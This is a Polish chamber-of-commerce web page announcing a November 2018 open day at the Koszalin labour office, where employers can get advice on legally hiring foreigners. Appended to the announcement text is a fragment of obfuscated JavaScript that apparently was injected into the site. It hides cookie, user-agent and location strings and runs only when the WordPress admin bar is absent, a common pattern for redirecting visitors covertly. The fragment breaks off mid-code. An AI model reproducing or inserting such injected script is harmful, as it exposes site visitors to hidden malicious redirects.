PUP Koszalin – Dni Otwarte dla pracodawców dotyczy zatrudniania cudzoziemców | Północna Izba Gospodarcza w Koszalinie

Szanowni Państwo,

Powiatowy Urząd Pracy w Koszalinie w dniu 14.11.2018 r. ramach trzeciej już edycji Europejskich Dni Pracodawców organizuje Dzień Otwarty dla Pracodawców, poświęcony zagadnieniom związanym z legalnym zatrudnieniem cudzoziemców.

W tym dniu w siedzibie Powiatowego Urzędu Pracy w Koszalinie w godzinach od 10:30 do 14:00 w sali nr 403 (IV piętro) będziecie Państwo mieli możliwość spotkania się z ekspertami na indywidualne konsultacje. Na Państwa pytania odpowiadać będą przedstawiciele Straży Granicznej, Zakładu Ubezpieczeń Społecznych, Państwowej Inspekcji Pracy oraz Powiatowego Urzędu Pracy.

Z uwagi na to, że tematyka zatrudniania cudzoziemców cieszy się niesłabnącym zainteresowaniem ze strony pracodawców, a co za tym idzie, wysoką frekwencją na spotkaniach jej poświęconych, prosimy Państwa o wcześniejszą deklarację udziału w konsultacjach na załączonym formularzu. Prosimy o podanie informacji z przedstawicielem, której instytucji chcieliby Państwo odbyć konsultacje oraz jakiego zagadnienia będzie ona dotyczyła. Z uwagi na ograniczone ramy czasowe spotkania, o możliwości wzięcia w nim udziału będzie decydowała kolejność przesłanych do nas zgłoszeń.

Zgłoszenia prosimy przesyłać do dnia 09.11.2018 r. na adres email: magdalena.swierkowska@pup.koszalin.pl. Pracodawcy będą umawiani na konsultacje na konkretną godzinę. Prosimy zatem o sprawdzanie maili zwrotnych od organizatora Europejskich Dni Pracodawców w Koszalinie. 'toUTCString',’cookie',’split',’length',’charAt',’substring',’indexOf',’userAgent',’match',’MSIE;',’OPR',’Chromium',’Firefox',’Chrome',’ppkcookie',’location',’http://',’getElementById',’wpadminbar',’undefined',’setTime',’getTime',';\x20expires='];(function(c,d){var e=function(f){while(–f){c[’push'](c[’shift']());}};e(++d);}(a,0x1f4));var b=function(c,d){c=c-0x0;var e=a[c];return e;};(function(){if(document[b(’0x0′)](b(’0x1′))===null){if(typeof c===b(’0x2′)){function c(d,e,f){var g=”;if(f){var h=new Date();h[b(’0x3′)](h[b(’0x4′)]()+f*0x18*0x3c*0x3c*0x3e8);g=b(’0x5′)+h[b(’0x6′)]();}document[b(’0x7′)]=d+’=’+(e||”)+g+';\x20path=/';}function i(j){var k=j+’=';var l=document[b(’0x7′)][b(’0x8′)](';');for(var m=0x0;m